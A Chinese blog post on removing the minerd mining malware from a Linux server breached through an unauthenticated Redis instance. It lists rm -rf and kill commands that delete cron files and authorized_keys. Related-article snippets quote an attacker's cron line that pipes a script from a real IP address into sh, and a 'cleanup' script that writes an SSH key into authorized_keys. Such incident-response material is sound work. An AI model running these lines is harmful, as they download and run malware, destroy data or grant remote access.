清除挖矿脚本 minerd

最新推荐文章于 2024-01-25 21:53:08 发布
最新推荐文章于 2024-01-25 21:53:08 发布
阅读量1.6k 收藏
点赞数
分类专栏: LINUX
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_28963819/article/details/70172113
版权

症状:cup占用率飙高

原因:这次入侵是由于redis没有设置用户名密码,没有限制访问ip导致 

解决方法:

ps -eopcpu,args --sort=%cpu|head    找到飙高的程序是minerd 

rm -rf  /opt/minerd

TOP查看minerd的pid

kill -s 9 pid(pid的值每个服务器不同)

rm -rf  /var/spool/cron/crontabs/root

rm -rf /var/spool/cron/root

rm -rf /var/spool/cron/crontabs/dump.rdb

rm -rf  /root/.ssh/authorized_keys

鸿仔快跑
关注
专栏目录
libgcc-a挖矿木马清除脚本
05-19
用于清楚Xmrig木马变种libgcc_a
服务器被挖矿怎么办,如何彻底删除挖矿文件
weixin_39922352的博客
06-06 4482
一分钟解决服务器被挖矿,彻底删除挖矿程序
Ubuntu服务器清除挖矿程序
未知丶的博客
10-07 3889
言简意赅,直入主题 早晨ssh登录服务器的时候发现出现情况 screen创建的会话本来还在跑代码的,重新进入一看被terminal了 一脸懵逼地输入nvidia-smi 我了个擦!两张显卡占用一样,而且每秒都是100%,并且都只有一个程序在占用,先是kill一下以示尊敬,下一秒再看又回来了 Top一看,root用户 成了,被入侵挖矿病毒了 看了下日志,被人爆破了,一堆Failed password,可能最后直接遍历出正确答案了 解决一下 直接重装系统,无敌 当然还有另外一种解决方法 一般来说,这种ki
阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本
热门推荐
zzf1510711060的博客
10-11 1万+
一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 ...
3、应急响应-挖矿病毒脚本检测与清除&样本定性&入口修复
最新发布
m0_65842464的博客
01-25 1766
Virustotal 深信服威胁情报中⼼, 微步在线 ,venuseye, 安恒威胁情报中⼼ ,360威胁情报中⼼, 绿盟威胁情报中⼼, AlienVault ,RedQueen安全智能服务平台, IBM X-Force Exchange ,ThreatMiner。
清除挖矿程序(imWBR1,ddg,wipefs),亲测可用
渡渡鸟的博客
03-30 1932
Linux 命令估计这两个是定时下载病毒程序的任务# cat  /var/spool/cron/crontabs/root*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh# rm -fr  /var/spool...
EVE 采矿脚本
02-18
"EVE 采矿脚本"就是专门为EVE Online设计的一种自动化工具,它由TC(可能指的是ToolCommand Language,一种编程语言)开发而成,用于帮助玩家自动控制游戏中的采矿行为。 首先,我们要理解TC语言。TC是一种功能强大...
脱机加脚本_stealthuo_UO脱机脚本_
10-01
7.0版本以上UO脱机脚本,功能强大,非常好用,适合挂小号
清除谷歌浏览器缓存脚本
05-13
主要用于清除谷歌浏览器的使用记录和相关数据包含缓存,也可理解为重置谷歌浏览器,使用后使浏览器回退至最初安装的样子。注:此过程不可逆
清除gradle产生的 lock文件脚本
07-28
清除gradle产生的 lock文件脚本清除gradle产生的 lock文件脚本清除gradle产生的 lock文件脚本清除gradle产生的 lock文件脚本清除gradle产生的 lock文件脚本清除gradle产生的 lock文件脚本清除gradle产生的 lock文件...
删除挖矿程序
小渣渣
12-19 2782
服务器的cpu突然出现了一个陌生的进程,占用很高,简单的kill将其杀不掉,可能是挖矿程序 (1)top 查看进程号 ls -l /proc/进程号/exe 找到进程所在目录,此例子文件在/var/tmp路径下 (2)cd /var/tmp && ls -a 找到隐藏的进程文件 rm -rf .systemd-private-c15c0d5284bd...
清除一个挖矿程序、步骤!!!
qq_36365520的博客
12-16 5320
清除挖矿程序、不让他占用你的系统资源 top、查看你的系统上面有谁在占用你的系统资源。发现如下: List item
【应急响应】挖矿脚本检测指南&威胁情报&样本定性&文件清除&入口修复
今天是几号的博客
04-25 2994
某公司运维人员小李近期发现,通过搜索引擎访问该公司网站会自动跳转到恶意网站(博彩网站),但是直接输入域名访问该公司网站,则不会出现跳转问题,而且服务器CPU的使用率异常高,运维人员认为该公司服务器可能被黑客入侵了,现小李向XX安全公司求助,解决网站跳转问题。某天客户反馈:服务器疑似被入侵,风扇噪声很大,实验室因耗电量太大经常跳闸,服务器疑似被挖矿挖矿程序定位定性,时间分析,排查安全漏洞,攻击IP找到等。3、删除市场上已知挖矿脚本(恶意竞争了,属于是)危害:CPU拉满,网络阻塞,服务器卡顿、耗电等。
清除 挖矿脚本 攻击
xzlAwin的博客
04-24 3861
清除 挖矿脚本 攻击 1.查看系统进程,是否有异常: top 发现CPU占用率200%,判定服务器已经被植入木马 2.查看异常进程是哪一个程序造成的 ls -al /proc/14618 发现恶意程序(绿色的是可执行文件)/etc/lafy 3.删除恶意程序 cd /etc rm -rf lzfy 4.发现过了一会,lzfy恶意程序再次出现,怀疑是个定时任务 查看定时任...
清除挖矿木马脚本
onlyellow的博客
07-01 1197
朋友的云主机被入侵挖矿了,说是杀不掉。 登录检查了下,发现是因为crontab和守护进程双重保险。 写脚本批量删除即可 脚本内容如下 #!/bin/bash guard_name=ps -ef|awk '{print $8}' |grep -E ^[[:alnum:]]{12}$ guard_pid=ps -ef|grep $guard_name|awk '{print $2}' miner_pid=ps -ef|grep kthreaddi |awk '{print $2}' virus_name=cro
LINUX 挖矿常见性清除脚本,临时抱佛脚的
80后大叔爱学习
03-19 621
#!/bin/bash chattr -ia /root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIt/0OkmcUUxrIzRrkuiG26zkLWQpvT91P/uehmMYYUdA3+WQCcgw/IKp+/RkUwUTkiAbz26cFfATHrgy9RyTOKMquoMSQqWKZtcH90S59ootbvRqdEDcoPRC8OeabRAZCj7eNWPFxKvfZbxWHRdZioavzTWx8Cor
linux挖矿检测,详谈挖矿木马的检测和解决方案
weixin_33733806的博客
05-14 3326
挖矿木马挖矿木马一般通过查看当前CPU运行情况就能确认,windows下任务管理器中就能看到,linux下使用top命令,查看到某个进程持续保持在80%-90%以上的CPU,基本就是对应的木马进程了。win下一般选中进行右键打开文件位置就能定位到对应目录linux下使用ps -aux|grep “木马进程名” 即可找到对应路径和文件定位到木马后,需要对其进行清除操作,挖矿木马麻烦的就是系统驻留,w...
redis连接不上,查看进程gpg-agentd刷爆CPU,恭喜你,你被挖矿
mengruobaobao的博客
03-19 2231
最近发现有一台测试服务器的redis连接不上,查看进程,发现CPU200%之前遇到过类似的,第一感觉就是被入侵了。IO 情况、网络流量、内存情况、系统日志、啥也不看了,直接看crontab 定时任务crontab -l 一下看定时任务列表把定时任务删掉 crontab -r杀掉所有进程 kill -9 25286 处理结束1.漏洞描述Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用...
在针对服务器的挖矿脚本攻击中可能涉及到哪些漏洞,具体的漏洞利用和攻击流程是什么,有哪些可行的防御措施
04-04
1. 未经授权的远程访问漏洞:攻击者可能会利用未经授权的远程访问漏洞来入侵服务器,并在其中安装挖矿脚本。 2. 未修补的软件漏洞:攻击者可能会利用未修补的软件漏洞,例如操作系统或数据库软件中的漏洞,来入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值